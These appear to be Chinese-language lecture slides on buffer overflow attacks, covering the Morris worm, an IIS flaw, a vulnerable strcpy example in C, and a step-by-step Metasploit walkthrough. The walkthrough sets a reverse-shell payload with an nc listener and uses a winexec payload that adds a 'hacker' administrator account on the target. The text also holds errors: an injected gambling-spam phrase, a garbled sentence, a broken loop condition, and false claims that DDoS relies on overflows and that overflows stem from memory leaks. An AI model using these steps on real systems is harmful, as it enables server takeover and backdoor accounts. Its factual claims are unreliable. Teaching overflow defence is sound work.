缓存溢出攻击.pptVIP

第3章 缓存溢出攻击 3.1 缓存溢出原理（buffer overflow） 3.2 缓存溢出漏洞利用 3.3 应对远程缓冲区溢出攻击 Morris 1988年，美国康奈尔大学的计算机科学系研究生、23岁的莫里斯利用Unix finger程序不限制输入长度的漏洞，输入512个字符后使缓冲器溢出，同时编写一段特别大的恶意程序能以root（根）身份执行，并感染到其他机器上。它造成全世界6000多台网络服务器瘫痪 。 一台win系统上的堆栈溢出，如果被恶意利用，将导致整个机器被黑客所控制，进而可能导致整个局域网落入黑客之手。在微软的产品iis server4.0中就被发现存在一种被称为“非法htr请求”的缺陷。据微软称，此缺陷在特定情况下会导致任意代码都可以在服务器端运行。黑客可以利用这一漏洞对iis服务器进行完全的控制，而实际上许多电子商务站点恰恰是基于这套系统的。 Metasploit是一个漏洞开发和利用的平台 其网站地址为/，必威体育精装版版本为3.2。 软件下载地址为/releases/framework-3.2.exe， 有关平台相关的paper可以到/research/conferences/进行下载。 主要有以下几步： （1）安装Metasploit （2）运行Metasploit （3）执行show exploits （4）选择相应的exploits （5）查看exploits。例如info iis50_printer_overflow （6）使用exploits，例如use iis50_printer_overflow （7）设置需要溢出程序的参数，例如设置端口和IP地址等。 （8）检查看能否溢出服务器或者PC ，执行check命令 （9）查看选项，show options，show payloads（10）查看溢出的一些选项，info win32_reverse（11）设置溢出选项，set payload win32_reverse（12）使用nc监听，以获取shell，nc -l -p 4321 在命令行下输入：“info Exploit iis50_webday_ntdll” 在命令行下依次输入：set RHOST set RPORT 80 Payload就是ShellCode。 在命令行下输入“show payloads”后可以看到可用的ShellCode列表 以BSD开头的是针对BSD系统的ShellCode. 以Linx开头的是针对Linux系统的ShellCode. 以CMD和WIN开头的是针对Windows系统。 不同的系统对不同的ShellCode要求是不一样的，要选择合适的ShellCode才可以成功溢出。 在命令行下输入：Info payload winexec set payload winexec set CMD net user hacker 123 /add net localgroup administrators hacker /add 最后指明目标主机的操作系统输入：show targets 接着输入：set target 0 输入：Set 检查无误后就可以开始溢出了，输入：Exploit 缓存溢出攻击是指通过往程序的缓冲区中写入超出其长度的内容造成溢出，从而破坏程序的堆栈，使程序转而执行其它指令，而达到攻击的目的。 缓冲溢出是一种系统攻击的手段。 黑客攻击root程序,然后执行类似exec(sh)的代码获得root的shell，它造成了两种严重的后果： 覆盖堆栈的相邻单元，使程序执行失败, 严重可导致系统崩溃。 可执行认识指令代码，最后获得系统root特级权限。 3.1 缓存溢出 缓存溢出（buffer overflow） 据统计，通过缓存溢出进行的攻击占所有系统攻击总数的80%以上，最近各大网站所遭受的所谓分布式服务拒绝（ddos）式的攻击也是一种利用缓存溢出原理的攻击方式。 缓冲区漏洞是程序员在编写程序时未检查内存空间,导致内存泄漏而引起。 example.c #include string.h void MyCopy(char *str) { char buffer[256]; strcpy(buffer,str); } int main() { int i; char buffer[512]; for(i=0;i=511;i++) buffer[i]=C; MyCopy(buffer); return 0; } Windows下编译运行： 用